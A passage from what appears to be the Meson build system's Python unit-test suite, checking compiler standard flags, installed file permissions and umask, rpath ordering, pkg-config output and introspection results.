self.init(testdir, extra_args=[f'-D{key!s}={v}'])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
            if v != 'none' and (compiler.get_id(), v) not in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print(f'{key!s} was {v!r}')
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if compiler.language == 'c':
env_flag_name = 'CFLAGS'
elif compiler.language == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(compiler.language))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
        # ICC won't fail in the above because additional flags are needed to
        # make it treat unknown -std=... options as errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc)
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp)
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '43 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
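        # stat.filemode() prefixes the entry type character ('-', 'd', ...), so compare
        # only the permission bits.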
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '191 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
        install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
        self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
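        # The expected rpath combines the $ORIGIN entry Meson adds for the library built in
        # the subdirectory with the /foo/bar entry coming from the test case (presumably
        # set via build_rpath in its meson.build).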
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skipIfNoPkgconfig
def test_build_rpath_pkgconfig(self):
'''
Test that current build artefacts (libs) are found first on the rpath,
manually specified rpath comes second and additional rpath elements (from
pkg-config files) come last
'''
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '90 pkgconfig build rpath order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz:/foo/dummy')
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz:/foo/dummy')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '81 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
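        # Formats flagged True are not rpath arguments at all; configuration is expected
        # to fail for them (checked with assertRaises below).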
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
tool_path = os.path.join(testdir, 'some_cross_tool.py')
crossfile.write(textwrap.dedent(f'''\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
sometool.py = ['{tool_path}']
someothertool.py = '{tool_path}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
'''))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
        '''
        Check that an application can be built against static libraries that were
        installed together with a Meson-generated pkg-config file.
        '''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
            # On these platforms, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
        as LD_LIBRARY_PATH, etc, so parts of this test are skipped there.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
